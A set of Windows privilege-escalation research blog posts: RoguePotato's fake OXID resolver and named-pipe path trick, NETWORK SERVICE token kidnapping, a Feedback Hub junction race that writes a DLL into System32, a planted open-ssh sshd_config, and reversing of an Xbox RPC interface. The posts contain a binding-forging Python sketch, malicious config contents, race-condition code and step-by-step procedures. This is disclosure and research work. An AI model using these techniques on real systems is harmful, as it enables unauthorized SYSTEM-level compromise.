  • On the remote IP, where a machine under our control is running, set up a “socat” listener (or whatever you prefer) to redirect the OXID resolution requests to a “fake” OXID RPC server, created by us and listening on a port different from 135. The fake server can run on the same Windows machine we are trying to exploit, but not necessarily.
  • The fake OXID RPC server implements the “ResolveOxid2” server procedure
  • This function will resolve the client’s (ANONYMOUS LOGON) query by returning RPC bindings which point to another “fake” RPC server listening on a dedicated port under our control, hosted on the victim machine.
  • The DCOM server will connect to the RPC server in order to perform the IRemUnknown2 interface call. By connecting to the second RPC server, an “Authentication Callback” is triggered, and if we have the SE_IMPERSONATE_NAME privilege, we can impersonate the caller via an RpcImpersonateClient() call
  • And yes, it worked! We got a SYSTEM token (coming from the BITS service in this case), but unfortunately it was an identification token, really useless.

The good news

So we abandoned the research until some days ago, when two interesting exploits/bugs had been published:

  1. Sharing a Logon Session a Little Too Much, published by @tiraniddo. In this blog you can also find the post along with a working POC demonstrating how it was possible for the NETWORK SERVICE account to elevate privileges (bug/feature?)
  2. The marvellous “PrintSpoofer” exploit published by @itm4n. In this case (and for our scenario) not for the exploit itself, but for the “bug” in the named pipe path validation checks.

On a late evening a few days ago, @splinter_code sent me a message:

(@splinter_code) “If we resolve the fake OXID request by providing an RPC binding with  our named pipe instead of the TCP/IP sequence, we should in theory be able to impersonate the NETWORK SERVICE Account and after that… SYSTEM is just a step beyond…”

(me) “Yeah, sounds good, let’s give it a try!”

And guess what? IT WORKED!!!

Let’s dig into the details.

The “fake” OXID Resolver

First of all, a little bit of context on how the OXID resolution works is required to understand the whole picture.
This is how the flow looks, taken from MSDN:

OXID resolution sequence

The client will be the RPCSS service, which will try to connect to our rogue OXID resolver (the server) in order to locate the binding information needed to connect to the specified DCOM object.

Consider that all the above requests made by the client in the OXID resolution sequence are authenticated (RPC security callback), impersonating the user running the COM object behind the CLSID we chose (usually the ones running as SYSTEM are of interest).
What the *potato exploits do is intercept this authentication and steal the token (well, technically it is a little bit more complicated, because the authentication is forwarded to the local system OXID resolver, which does the real authentication, and *potato just alters some packets to steal the token… a classic MITM attack).
When this is done over the network (due to the MS fix), this will be an ANONYMOUS LOGON, so quite useless for an EoP scenario.

Our initial idea was to exploit one of the OXID resolver’s (technically called IObjectExporter) methods and forge a response that could trigger a privileged authentication to our controlled listener.

Looking at the scheme above, 2 functions caught our attention:

The first request was not of interest because we couldn’t specify endpoint information in it (which is what we needed), so we always answered with RPC_S_OK. This is an example of what a standard response looks like:

[packet capture: a standard ServerAlive2 response]

So we focused on the next one (ResolveOxid2), and what we saw was something interesting that we could abuse:

[packet capture: a standard ResolveOxid2 response]

Observing the above traffic, which is a standard response captured from the real OXID resolver on a Windows machine, we quickly spotted that we could abuse this call by forging our own ResolveOxid2 response and specifying our controlled listener as the endpoint.
We can specify endpoint information in the format ipaddress[endpoint] and also the TowerId (more on that later).

But… why not register the binding information we require on the system OXID resolver, get the OID and OXID from the system, and ask for the unmarshalling of that?
Well, to our knowledge the only way to do that is by registering a CLSID on the system, and to do that you need Administrator privileges.

So our idea was to implement a whole OXID resolver that would always answer with our listener’s binding for whatever OXID/OID it receives: just a fake OXID resolver.

Let’s analyze the function ResolveOxid2 to understand how to forge our response:

[idempotent] error_status_t ResolveOxid2(
   [in] handle_t hRpc,
   [in] OXID* pOxid,
   [in] unsigned short cRequestedProtseqs,
   [in, ref, size_is(cRequestedProtseqs)] 
     unsigned short arRequestedProtseqs[],
   [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,
   [out, ref] IPID* pipidRemUnknown,
   [out, ref] DWORD* pAuthnHint,
   [out, ref] COMVERSION* pComVersion
 );

What we need to do is fill the DUALSTRINGARRAY ppdsaOxidBindings with our controlled listener.
Well, that was a little bit tricky, but it is well documented by MS (in 1 and 2), so it was just a matter of trial and error to forge the right offsets/sizes for the packet.
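As a rough illustration of those offsets, here is a Python sketch that packs a minimal DUALSTRINGARRAY (layout per MS-DCOM: a header of two 16-bit counters, then the string bindings, then the security bindings, each set null-terminated). The real RoguePotato code builds this in C, and the security-binding part is simplified here to an empty set:

```python
import struct

NCACN_NP = 0x0F  # protocol tower id for connection-oriented named pipes

def make_dualstringarray(tower_id, network_addr):
    # STRINGBINDING: wTowerId + null-terminated UTF-16LE network address,
    # then one extra null u16 terminates the whole string-binding set.
    string_part = struct.pack("<H", tower_id)
    string_part += network_addr.encode("utf-16-le") + b"\x00\x00"
    string_part += b"\x00\x00"
    security_part = b"\x00\x00"  # empty security-binding set: just its terminator
    array = string_part + security_part
    w_num_entries = len(array) // 2            # length of the array in u16 words
    w_security_offset = len(string_part) // 2  # word offset of the security part
    return struct.pack("<HH", w_num_entries, w_security_offset) + array

blob = make_dualstringarray(NCACN_NP, r"localhost/pipe/roguepotato[\pipe\epmapper]")
```

The two header words are what made the “offsets/sizes” fiddly: both are counted in 16-bit units, not bytes.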

Let’s recap: we can redirect the client to our controlled endpoint (aNetworkAddr), and we can choose the protocol sequence identifier constant that identifies the protocol to be used in the RPC calls (wTowerId).

There are multiple protocols supported by RPC (here a list).

In the first attempt we tried ncacn_ip_tcp as the TowerId, which allows RPC straight over TCP.
We ran an RPC server (keep in mind that a “standard” user can set up and register an RPC server) exposing the IRemUnknown2 interface and tried to authenticate the request in our SecurityCallback by calling RpcImpersonateClient.
Returning ncacn_ip_tcp:localhost[9998] in the ResolveOxid2 response, an authentication to our RPC server (IRemUnknown2) was triggered, but unfortunately it was just an identification token…

[screenshot: identification token received on the IRemUnknown2 call]

 

So that was a dead end… But what about “connection-oriented named pipes”, ncacn_np?

The named pipe Endpoint mapper

First of all, what is the “epmapper”? Well, it’s related to the “RpcEptMapper” service. This service resolves RPC interface identifiers to transport endpoints. Same concept as the OXID resolver, but for RPC.

The mapper listens on TCP port 135 but can also be queried via a special named pipe, “epmapper”.

This service shares the same process space as the “rpcss” service, and both of them run under the NETWORK SERVICE account. So if we are able to impersonate an account from this process, we can steal a SYSTEM token (because this process hosts juicy tokens)…

The first thing we tried was to return a named pipe under our control in the ResolveOxid2 response:

ncacn_np:localhost[\pipe\roguepotato]

But observing the network traffic, RPCSS still connected to \pipe\epmapper. This is because, by protocol design, the epmapper named pipe must be used, and this is obviously a “reserved” name.

No way…

When we read the PrintSpoofer post, we were impressed by the clever named pipe path validation bypass (credits to @itm4n and @jonasLyk), where inserting ‘/’ into the hostname makes it become part of the named pipe path!

With that in mind we returned the following binding information:

ncacn_np:localhost/pipe/roguepotato[\pipe\epmapper]

And you know what? RPCSS tried to connect to the nonexistent named pipe \roguepotato\pipe\epmapper:

[screenshot: named pipe not found]
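The path mangling can be modeled with a toy function (my simplification, not the actual RPC runtime code): ncacn_np turns host[endpoint] into the UNC path \\host + endpoint, and the server-side pipe name is whatever follows \\<host>\pipe\:

```python
def pipe_name_from_binding(network_addr, endpoint):
    """Toy model of how a '/'-laced host in an ncacn_np binding shifts the
    resulting named pipe. Not the real RPC runtime logic."""
    # "localhost/pipe/roguepotato" + "\pipe\epmapper" becomes the UNC path
    # \\localhost\pipe\roguepotato\pipe\epmapper once '/' is normalized to '\'.
    unc = "\\\\" + network_addr.replace("/", "\\") + endpoint
    # The local pipe name is everything after the first \\<host>\pipe\ prefix.
    _host, _sep, name = unc[2:].partition("\\pipe\\")
    return name

print(pipe_name_from_binding("localhost/pipe/roguepotato", "\\pipe\\epmapper"))
```

With the legitimate host the client ends up on the real \pipe\epmapper; with the smuggled ‘/’ segments it lands on the \roguepotato\pipe\epmapper listener instead.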

Great! So we set up a pipe listener on \\.\pipe\roguepotato\pipe\epmapper, got the connection and impersonated the client. Then we inspected the token with TokenViewer:

[screenshot: TokenViewer output]

So we had an impersonation token of the NETWORK SERVICE account and also the LUID of the RPCSS service!

Why that? Well, the answer was in the post mentioned above:

if you can trick the “Network Service” account to write to a  named pipe over the “network” and are able to impersonate the pipe, you can access the tokens stored in RPCSS service

All the “magic” of the fake ResolveOxid2 response happens in this piece of code:

[screenshot: the forged ResolveOxid2 implementation]

The Token “Kidnapper”

Perfect! Now we just needed to perform the old and well-known token kidnapping technique to steal a SYSTEM token from the RPCSS service.

We set up a minimalist “stealer” which performs the following operations:

  • get the PID of the “rpcss” service
  • open the process, list all its handles and, for each handle, try to duplicate it and get the handle type
  • if the handle type is “Token” and the token owner is SYSTEM, try to impersonate it and launch a process with CreateProcessAsUser() or CreateProcessWithToken()
  • in order to get rid of the occasional “Access Denied” when trying to launch a process in Session 0, we also set up the correct permissions on the window station/desktop
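The selection step of the stealer boils down to a filter over the duplicated handles; sketched here with hypothetical stand-in records (the real enumeration uses handle duplication and token queries, all Windows-specific):

```python
from dataclasses import dataclass

@dataclass
class HandleInfo:
    """Hypothetical record for a handle duplicated out of the rpcss process."""
    type_name: str  # e.g. "Token", "File", "Event"
    owner: str      # token owner, as a token query would report it

def pick_system_tokens(handles):
    # Keep only Token handles owned by SYSTEM: the impersonation candidates.
    return [h for h in handles if h.type_name == "Token" and h.owner == "SYSTEM"]

rpcss_handles = [
    HandleInfo("File", "-"),
    HandleInfo("Token", "NETWORK SERVICE"),
    HandleInfo("Token", "SYSTEM"),
]
candidates = pick_system_tokens(rpcss_handles)
```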

Well, let’s unleash RoguePotato and see our SYSTEM shell popping 😀

[screenshot: SYSTEM shell]

Final Thoughts

Probably you are a little bit confused at this point, so let’s do a recap. Under which circumstances can I use this exploit to get SYSTEM privileges?

  • You need a compromised account on the victim machine with impersonation privileges (but this is the prerequisite for all these types of exploits). A common scenario is code execution on a default IIS/MSSQL configuration.
  • If you are able to impersonate the NETWORK SERVICE account, or if the “spooler” service is not stopped, you can first try the other exploits mentioned before…
  • You need to have a machine under your control where you can perform the redirect, and this machine must be reachable on port 135 by the victim
  • We set up a POC with 2 exe files. It is also possible to launch the fake OXID resolver in standalone mode on a Windows machine under our control when the victim’s firewall won’t accept incoming connections.
  • Extra mile: in the old *potato exploits, an alternative way of stealing the token was just to set up a local RPC listener on a dedicated port instead of forging the local NTLM authentication; RpcImpersonateClient() would have done the rest.

To sum it up:

[diagram: RoguePotato exploit flow]

You can find the source code and POC of RoguePotato here.

Final note: we didn’t bother to report this “misbehavior?” to MS because they stated that elevating from a Local Service process (with SeImpersonate) to SYSTEM is “expected behavior”. (RogueWinRm – Disclosure Timeline)

That’s all 😉

@splinter_code, @decoder_it


From NETWORK SERVICE to SYSTEM

By: Decoder
4 May 2020 at 15:58

In the last period, there has been a lot of research on how to escalate privileges by abusing generic impersonation privileges usually assigned to SERVICE accounts.

Needless to say, a SERVICE account is required in order to abuse these privileges.

The latest one, in order of time, “PrintSpoofer”, is probably the most dangerous/useful because it only relies on the “Spooler” service, which is enabled by default on all Windows versions.

In Windows 10 and Windows Server where WinRM is not enabled, you can use our “Rogue WinRM listener” in order  to capture a SYSTEM token.

And of course, in Windows Server versions 2016 and Windows 10 up to 1803, our Rotten/Juicy Potato is still kicking!

In this post I’m going to show you how it is possible to get SYSTEM privileges from the Network Service account, as described in Forshaw’s post “Sharing a Logon Session a Little Too Much“. I suggest you read it first, if you haven’t already done so, as I won’t detail the internal mechanism.

In short, if you can trick the “Network Service” account into writing to a named pipe over the “network” and are able to impersonate the pipe client, you can access the tokens stored in the RPCSS service (which is running as Network Service and contains a pile of treasures) and “steal” a SYSTEM token. This is possible because of some “weird” checks/assignments on the token’s Authentication ID. The token of the caller (coming from the RPCSS service) will have the Authentication ID of the service assigned, and if you impersonate this token you will have complete access to the RPCSS process, including its tokens (because the impersonated token belongs to the group “NT SERVICE\RpcSs”).

Side note: here you can find some other “strange” behaviors based on AuthID.

Given that the local loopback interface (127.0.0.1) is considered a network logon/access, it’s possible to exploit this (mis)behavior locally with an all-in-one tool.

The easiest scenario is a compromised “Network Service” account with shell access, and this will be our starting point. In this situation, we can directly write to the named pipe via the loopback interface, impersonate the client and access the RPCSS process tokens.

Note: For testing purpose, you can impersonate the “Network Service” account using psexec from an admin shell:

  • psexec64 -i -u “NT AUTHORITY\Network Service” cmd.exe

There are many ways to accomplish this task, for example with Forshaw’s NtObjectManager library in PowerShell (keep in mind that the latest MS Defender updates mark this library as malicious!??)

But my goal was to create a standalone executable in plain old vanilla style, and given that I’m very lazy, I found most of the functions I needed in the old but always good incognito2 project. The source code is very useful and educational; it’s worth studying.

I reused the most relevant parts of the code and made some minor changes in order to adapt it to my needs and also to evade AVs.

Basically this is what it does:

  • start a named pipe server listening on a “random” pipe
  • start a pipe client thread, connect to the random pipe via “localhost” and write some data
  • in the pipe server, once the client connects, impersonate the client (coming from “RPCSS”)
  • list the tokens of all processes:
  • if a SYSTEM token is available, impersonate it and execute your shell or whatever you prefer:

[screenshot: SYSTEM shell]

 

The “adapted” source code for my POC can be found here: https://github.com/decoder-it/NetworkServiceExploit

That’s all 😉

 


Exploiting Feedback Hub in Windows 10

By: Decoder
28 April 2020 at 15:36

Feedback Hub is a feature in Windows 10 which allows users to report problems or suggestions to Microsoft. It relies on the “diagtrack” service, running as SYSTEM, better known as “Connected User Experiences and Telemetry”.

When the Feedback Hub gathers info in order to send it to MS, it performs a lot of file operations, most of them as the SYSTEM user. It turns out that this application and the related services/executables which are run during the collection have a lot of logical bugs which can be exploited via directory junctions or symbolic links via “\RPC Control”.

These “bugs” could permit a malicious user to perform the following operations:

  • Arbitrary File Read (Information Disclosure)
  • Arbitrary File Overwrite with contents not controlled by the attacker (Tampering)
  • Arbitrary File Overwrite/Write with contents controlled by the attacker (Elevation of Privilege)
  • Arbitrary File/Folder Deletion (Elevation of Privilege)

In my investigations, I was able to perform all these operations in various circumstances.

Today I’m going to show you how it is possible to perform an Arbitrary File Overwrite/Write which could easily lead to EoP. I found this issue in Windows 10 Preview up to build 10.0.19592.1001. In the “standard” Windows 10 version, the bug was much easier to exploit.

This issue was fixed in an “unintended” way in CVE-2020-0942 and subsequently in the latest WIP build (10.0.19608.1006).

Prerequisites

  • Standard Windows 10 / domain user with a Windows 10 computer (virtual or physical)
  • Diagnostics & Feedback has to be set to “Full” mode
    • If “Basic” was selected at the first logon, this can be changed by the logged-on user in Settings->Privacy->Diagnostics & feedback by switching from “required” to “optional”

Description

When an attachment is sent via the Feedback Hub app and you choose to “Save a local copy…”, several file operations are performed by the diagtrack service, mostly with SYSTEM user privileges.

[screenshot: Feedback Hub “Save a local copy” option]

 

Here is an overview of the most significant operations.

First, the diagtrack service, impersonating the current user, creates a temporary random folder named diagtracktempdir<XX..X> under the “c:\Users\<user>\AppData\Local\Temp” directory:

[procmon: creation of diagtracktempdir<XX..X>]

During the creation of the directory, the impersonated user also sets new permissions. These are not inherited from the parent folder and are very restrictive; in fact, as we can see in the following screenshot, the permissions on this directory do not include the current user:

cattura.JPG

For the subdirectories and files inside it, however, the current user has some privileges.

cattura.JPG

In the next screenshot we can observe that files and folders are created without user impersonation and therefore as SYSTEM. It should also be noted that even the file uploaded as the feedback attachment (windowscoredeviceinfo.dll in this case) is now copied into the temporary folder. Additionally, all the files and folders created or copied into the temporary path will inherit these new permissions.

cattura.JPG

Once the process is complete, diagtracktempdir<XX..X> is renamed and moved into the current user’s FeedbackHub path. Subsequently, restrictive permissions are again set on the top-level directory of the renamed folder:

cattura.JPG

 

So the question is:

Is it still possible to abuse this with a specially crafted “junction”?

Theoretically yes: the primary folder diagtracktempdir<XX..X> is created by the current user. Even though the permissions are subsequently changed in a more restrictive way (the user is granted only READ access), they can still be modified, because the user is the owner of the directory.

Practically, there is a race condition to win. Specifically, the permissions on diagtracktempdir<XX..X> have to be changed before the subdirectories are created by SYSTEM without impersonation. In this way, the new permissions will be propagated, and the attacker will have full access to all of its contents.

Winning such a race condition is hard. The time between the two events is on the order of milliseconds, and you have to inject your “malicious” code for altering the permissions in that window…

cattura.JPG

 

Nevertheless, I found a couple of solutions to win the race condition and developed a PoC/tool in VS2019 C++.

Note: In order to speed up the tests, always choose “Suggest a feature” in Feedback Hub.

Only 1 Hard disk present

I tested this procedure on both physical and virtual machines. Depending on the hardware, performance and current workload, I was sometimes able to perform the exploitation on the first run; in other cases, it took up to 10-15 attempts.

First of all, run the “Feedback Hub” app and exit. This will create the initial directory and settings if never launched before.

This is the “Logical Flow” of my Poc/Tool:

  • Thread 1: Run a file watcher for the directory “c:\users\<user>\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\LocalState\DiagOutputDir”.
    This will intercept the creation of a directory and save the directory {GUID}, useful for later.
  • Thread 2: Run a file watcher for the directory “c:\users\<user>\appdata\local\temp”.
    This will intercept the creation of the folder diagtracktempdir<XX..X>.
    • When the directory is created, immediately change its permissions, e.g. everyone:full.
      Note: the SetSecurityInfo API function is not suitable because it is slow (it does a lot of unnecessary work “under the hood”); NtSetSecurityObject is faster because it is more “atomic”.
    • We know what the final path name will look like:
      “diagtracktempdir<XX..X>\get info T0FolderPath\<{GUID}>”
  • Loop to create a “junction point” from the identified path to our target directory. Loop until the error is “path/file not found”.

If everything works fine, we should have copied our file into the destination directory. Otherwise, the loop will exit with an “access denied” error, which means we were too late.
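The “watch then loosen” step of Thread 2 can be sketched as follows. This is a portable stand-in, not the actual PoC: on Windows the watcher would be ReadDirectoryChangesW and the permission change NtSetSecurityObject, while here stat() and chmod() play those roles, and the function name is mine:

```c
#include <sys/stat.h>
#include <time.h>

/* Poll until `dir` appears, then immediately loosen its permissions.
   stat()/chmod() stand in for the Win32 watcher and NtSetSecurityObject.
   Returns 0 on success, -1 on timeout. */
int watch_and_loosen(const char *dir, int timeout_ms)
{
    struct stat st;
    struct timespec nap = { 0, 1000000 }; /* poll every 1 ms */
    for (int i = 0; i < timeout_ms; i++) {
        if (stat(dir, &st) == 0)
            return chmod(dir, 0777); /* "everyone: full" equivalent */
        nanosleep(&nap, NULL);
    }
    return -1; /* the directory never showed up in time */
}
```

In the real PoC this logic runs in its own thread while the junction-creation loop spins in another; the 1 ms poll here only keeps the sketch simple.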

The following screenshots show how I was able to write the previously attached WindowsCoreDeviceInfo.dll into c:\windows\system32:

cattura.JPG

 

cattura.JPG

The following screenshot shows that the SetSecurity executed by the exploit happened before the creation of the directory “get info T0FolderPath”:

cattura.JPG

And the directory was successfully mounted:

cattura.JPG

Finally, the file is copied into the target directory, and EoP is just one step away 😉

cattura.JPG

Two or more hard disks/partitions present (including the possibility of mounting an external USB disk)

I tested this procedure on both physical and virtual machines. In my test environment (a physical and a virtual machine, each with 2 partitions) I was able to perform the exploitation on the first run. This solution is much more reliable.

Mounting an external USB disk on a physical machine can be accomplished by a standard user.

First of all, run the “Feedback Hub” app and exit. This will create the initial directory and settings if never launched before.

In this scenario, we will create a junction from the directory “c:\users\<user>\documents\feedbackhub” to a directory located on another drive. This will force “reparse” operations whenever a file is opened, and this introduces delays, especially if the junction points to a different drive/partition.

When the junction is in place, the user’s “…appdata\local\temp” directory is no longer used, and the diagtracktempdir<XX..X> directory is created directly under the FeedbackHub folder.

The only prerequisite is that the FeedbackHub folder has to be empty, which means that no previous feedback with locally saved attachments must have been submitted, because once the folders and files are created, the user cannot delete them.

The following steps are required to win the race condition:

  1. Create the junction:
     cattura.JPG
  2. Use the junction directory instead of “…appdata\local\temp” in the C++ exploit:
     cattura.JPG
  3. Submit a new feedback and load a malicious DLL as the attachment:
     cattura.JPG

Et voilà! Our DLL was copied into the System32 folder:

cattura.JPG

 

Conclusions

This is just one of the many remaining possibilities for performing privileged file operations by abusing the generic “error reporting” functionalities in Windows 10.

If you’re hunting for CVEs, maybe this is worth a try. All you need is Procmon, time and patience 😉

 

POC can be downloaded here

 

 


The strange case of “open-ssh” in Windows Server 2019

By: Decoder
19 March 2020 at 16:46

A few weeks ago I decided to install “open-ssh” on a Windows 2019 server for management purposes. The ssh server/client is based on the opensource project, and the MS implementation source code can be found here

Installing ssh is a very easy task: all you have to do is install the “feature” via powershell:

ssh1

The first time you start the service, the necessary directories and files are created under the directory “c:\programdata\ssh”.

ssh3

 

ssh4

ssh2

A standard “sshd_config” file is created, and this file is obviously read-only for users:

ssh5

So a strange idea came to my mind: what if I created a special kind of malicious “sshd_config” file before the first launch of the open-ssh server?

As a standard user, with no special privileges, I am able to create the “ssh” directory and write files…

And what should my “sshd_config” file contain? Well, easy: the possibility to login as an administrator with a predefined public/private key pair!

So let’s start again from the beginning… the sshd server has not yet been installed or launched for the first time.

First of all, we need to create a “special” sshd_config file; here are the relevant parts:

StrictModes no
....
PubkeyAuthentication yes
....
Match Group administrators
     AuthorizedKeysFile c:\temp\authorized_keys

  1. “StrictModes” set to “no” will bypass the strict owner/permissions checks on the “authorized_keys” file
  2. “PubkeyAuthentication” set to “yes” will permit login via public/private keys
  3. “Match Group administrators” will point to an “authorized_keys” file generated by the user

Point 3 is very interesting: we have the possibility to define a unique private/public key pair for authenticating the members of the “administrators” group.
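The planting step itself is trivial; as a sketch in C (the helper name and test path are mine — on the target, the file would be written to c:\programdata\ssh\sshd_config before the first sshd launch):

```c
#include <stdio.h>

/* Write the attacker-controlled sshd_config described above.
   On the target the path would be c:\programdata\ssh\sshd_config;
   any path writable by the standard user works for testing.
   Returns 0 on success, -1 on failure. */
int plant_config(const char *path)
{
    FILE *f = fopen(path, "w");
    if (!f)
        return -1;
    fputs("StrictModes no\n"
          "PubkeyAuthentication yes\n"
          "Match Group administrators\n"
          "    AuthorizedKeysFile c:\\temp\\authorized_keys\n", f);
    return fclose(f); /* fclose returns 0 on success */
}
```

Any language works here, of course; the point is simply that the file is created by the standard user before sshd ever runs.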

Now we have to generate our public/private key pair. In this example, I will use the ssh utilities for Windows, but you can also create them on other systems (e.g. Linux).

ssh1

 

Once done, we will copy the public key, in this example under c:\temp:

ssh2

The next step is creating the c:\programdata\ssh directory and copying the config file into it:

ssh4

At this point we just have to wait for the “sshd” service to be launched; for testing, we can start it on our own as an admin:

ssh5

Our config file has not been changed and we are still able to modify it!

Let’s see if it works. We are going to use OUR private/public key pair in order to log in as administrator:

sssh6

ssh7

 

Yes, it works! 🙂

Even if the preconditions are not so “common”, this installation/configuration bug (which has nothing to do with the open-ssh software suite itself) could easily lead to EoP, don’t you agree?

So I informed MSRC about this; they opened a case, and some days later they told me that this had already been fixed with CVE-2020-0757, probably as an “unintended” side effect…

Strange! My Windows 2019 server was fully patched, including the latest CVEs. So I tested this on a Windows 10 machine, updated it with the latest patches, and after that I actually found an empty “c:\programdata\ssh” folder with correct permissions, even though open-ssh was not installed.

But why did this not happen on my Windows 2019 server?

I tested other servers as well, installed a new one from scratch, and always got the same result: no empty c:\programdata\ssh directory!

I had a long debate about this with MSRC; basically, they were stating that they could not reproduce it. And then, magically, with the March Patch Tuesday updates, the directory was finally created by KB4538461!

Really strange, but that’s it, and given that it’s now fixed, I decided to publish this post!

Stay safe, remember to keep “physical distancing” and not “social distancing” 🙂


The strange RPC interface (MS, are you trolling me?)

By: Decoder
5 February 2020 at 18:07

On a dark and stormy night, I was playing with Forshaw’s fantastic NtObjectManager library which, among a million other things, is able to “disassemble” RPC servers and implement Local RPC calls in .NET.

I was looking at “interesting” RPC servers on my Windows 10 1909 machine when my attention was caught by the “XblGameSave.dll” library.

This Dll is used by the “Xbox Live Game Save” service:

xblsrv2

What is the purpose of this service? Well, I never played with Xbox nor Xbox games on Windows, but MS states that:

This service syncs save data for Xbox Live save enabled games. If this service is stopped, game save data will not upload to or download from Xbox Live.”

The service runs under the SYSTEM user context and is set to manual-triggered startup:

xblsrv

In short,  XblGameSave can be started upon a remote procedure call event.

I immediately popped up a new powershell instance as a standard user, imported the NtObjectManager library and took a look at the Dll:

xbl2

Looked promising! The Dll exported a Local RPC call, “svcScheduleTaskOperation”, with Interface ID f6c98708-c7b8-4919-887c-2ce66e78b9a0, running as SYSTEM. Maybe I could abuse this call to schedule a task as a privileged user?

Side note: I was able to get all this detailed information because I also specified the corresponding .pdb symbol file located in c:\symbols. You can download symbol files with the symchk.exe tool, available with the Windows SDK:

symchk.exe /v c:\windows\system32\xblgamesave.dll /s SRV*c:\symbols\*http://msdl.microsoft.com/download/symbols

 

In order to obtain more information about the exposed interface, I created a client instance:

xbl3

The mysterious svcScheduleTaskOperation() wanted a string as its input parameter. The next step was connecting to the RPC server:

xbl4

Cool! When connecting my client, I was able to trigger and start the service, so I tried to invoke the RPC call:

xbl5

 

As you can imagine, the problem now was guessing which string the function was expecting…

The return value -2147024809 (0x80070057, E_INVALIDARG) was only telling me that the parameter was “Incorrect”. Thanks, this was a great help 😦

I hate fuzzing and bruteforcing, and I must admit that I’m really a noob in this field; this clearly was not the right path for me.

At this point, decompiling the Dll was no longer just an option! I also had the symbol file, so the odds of getting something readable and understandable by common humans like me were well founded.

xblc1

This was the pseudo-C code generated by IDA. In short, as far as I understood (I’m not that good at reversing): if the input parameter (a2) was not NULL, the Windows API WindowsCreateString was called, and the resulting HSTRING was passed to the ScheduledTaskOperation() method belonging somehow to the ConnectedStorage class.

connectedstor

I obviously googled for more information with the keyword “ConnectedStorage”, but surprisingly all the resulting links pointing to the MS site returned a 404 error… The only way was to retrieve cached pages: https://webcache.googleusercontent.com/search?q=cache:dEN5ets6TcYJ:https://docs.microsoft.com/en-us/gaming/xbox-live/storage-platform/connected-storage/connected-storage-technical-overview

 

It seemed that the “ConnectedStorage” class, implemented in this Dll, had the following purpose:  “Store saved games and app data on Xbox One”  (and probably Windows 10 “Xbox” games too?)

My goal was not to understand the deep and mysterious mechanisms of these classes, so I jumped to the ScheduledTaskOperation() function:

void __fastcall ConnectedStorage::Service::ScheduledTaskOperation(LPCRITICAL_SECTION lpCriticalSection, const struct ConnectedStorage::SimpleHStringWrapper *a2)
{
  const struct ConnectedStorage::SimpleHStringWrapper *v2; // rdi
  LPCRITICAL_SECTION v3; // rbx
  unsigned int v4; // eax
  const unsigned __int16 *v5; // r8
  unsigned int v6; // eax
  const unsigned __int16 *v7; // r8
  unsigned int v8; // eax
  const unsigned __int16 *v9; // r8
  unsigned int v10; // eax
  const unsigned __int16 *v11; // r8
  unsigned int v12; // eax
  const unsigned __int16 *v13; // r8
  unsigned int v14; // eax
  const unsigned __int16 *v15; // r8
  unsigned int v16; // eax
  const unsigned __int16 *v17; // r8
  unsigned int v18; // eax
  const unsigned __int16 *v19; // r8
  unsigned int v20; // eax
  const unsigned __int16 *v21; // r8
  unsigned int v22; // eax
  const unsigned __int16 *v23; // r8
  const unsigned __int16 *v24; // r8
  int v25; // [rsp+20h] [rbp-40h]
  __int64 v26; // [rsp+28h] [rbp-38h]
  LPCRITICAL_SECTION v27; // [rsp+30h] [rbp-30h]
  __int64 v28; // [rsp+38h] [rbp-28h]
  __int128 v29; // [rsp+40h] [rbp-20h]
  int v30; // [rsp+50h] [rbp-10h]
  char v31; // [rsp+54h] [rbp-Ch]
  __int16 v32; // [rsp+55h] [rbp-Bh]
  char v33; // [rsp+57h] [rbp-9h]

  v2 = a2;
  v3 = lpCriticalSection;
  v27 = lpCriticalSection;
  v28 = 0i64;
  EnterCriticalSection(lpCriticalSection);
  v26 = 0i64;
  v4 = WindowsCreateString(L"standby", 7i64, &v26);
  if ( (v4 & 0x80000000) != 0 )
    ConnectedStorage::ReportErrorAndThrow(
      (ConnectedStorage *)v4,
      (const wchar_t *)L"WindowsCreateString(str, static_cast<UINT32>(wcslen(str)), &_hstring)",
      v5);
  v25 = 0;
  v6 = WindowsCompareStringOrdinal(*(_QWORD *)v2, v26, &v25);
  if ( (v6 & 0x80000000) != 0 )
    ConnectedStorage::ReportErrorAndThrow(
      (ConnectedStorage *)v6,
      (const wchar_t *)L"WindowsCompareStringOrdinal(_hstring, right._hstring, &result)",
      v7);
  WindowsDeleteString(v26);
  if ( v25 )
  {
    v26 = 0i64;
    v8 = WindowsCreateString(L"maintenance", 11i64, &v26);
    if ( (v8 & 0x80000000) != 0 )
      ConnectedStorage::ReportErrorAndThrow(
        (ConnectedStorage *)v8,
        (const wchar_t *)L"WindowsCreateString(str, static_cast<UINT32>(wcslen(str)), &_hstring)",
        v9);
    v25 = 0;
    v10 = WindowsCompareStringOrdinal(*(_QWORD *)v2, v26, &v25);
    if ( (v10 & 0x80000000) != 0 )
      ConnectedStorage::ReportErrorAndThrow(
        (ConnectedStorage *)v10,
        (const wchar_t *)L"WindowsCompareStringOrdinal(_hstring, right._hstring, &result)",
        v11);
    WindowsDeleteString(v26);
    if ( v25 )
    {
      v26 = 0i64;
      v12 = WindowsCreateString(L"testenter", 9i64, &v26);
      if ( (v12 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v12,
          (const wchar_t *)L"WindowsCreateString(str, static_cast<UINT32>(wcslen(str)), &_hstring)",
          v13);
      v25 = 0;
      v14 = WindowsCompareStringOrdinal(*(_QWORD *)v2, v26, &v25);
      if ( (v14 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v14,
          (const wchar_t *)L"WindowsCompareStringOrdinal(_hstring, right._hstring, &result)",
          v15);
      WindowsDeleteString(v26);
      if ( !v25 )
      {
        v31 = 1;
LABEL_11:
        v30 = 4;
        _mm_storeu_si128((__m128i *)&v29, (__m128i)GUID_LOW_POWER_EPOCH);
        v33 = 0;
        v32 = 0;
        ConnectedStorage::Power::PowerChangeCallback(v3 + 4, 0i64, &v29);
        goto LABEL_12;
      }
      v26 = 0i64;
      v16 = WindowsCreateString(L"testexit", 8i64, &v26);
      if ( (v16 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v16,
          (const wchar_t *)L"WindowsCreateString(str, static_cast<UINT32>(wcslen(str)), &_hstring)",
          v17);
      v25 = 0;
      v18 = WindowsCompareStringOrdinal(*(_QWORD *)v2, v26, &v25);
      if ( (v18 & 0x80000000) != 0 )
        ConnectedStorage::ReportErrorAndThrow(
          (ConnectedStorage *)v18,
          (const wchar_t *)L"WindowsCompareStringOrdinal(_hstring, right._hstring, &result)",
